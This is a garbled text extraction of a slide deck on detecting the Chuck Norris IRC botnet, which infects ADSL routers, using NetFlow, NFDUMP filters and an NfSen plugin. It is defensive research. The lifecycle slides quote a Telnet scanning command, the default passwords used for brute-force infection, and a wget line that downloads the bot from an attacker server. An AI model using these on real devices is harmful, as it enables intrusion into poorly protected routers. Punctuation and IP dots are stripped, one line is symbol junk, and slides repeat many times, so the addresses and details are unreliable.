Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
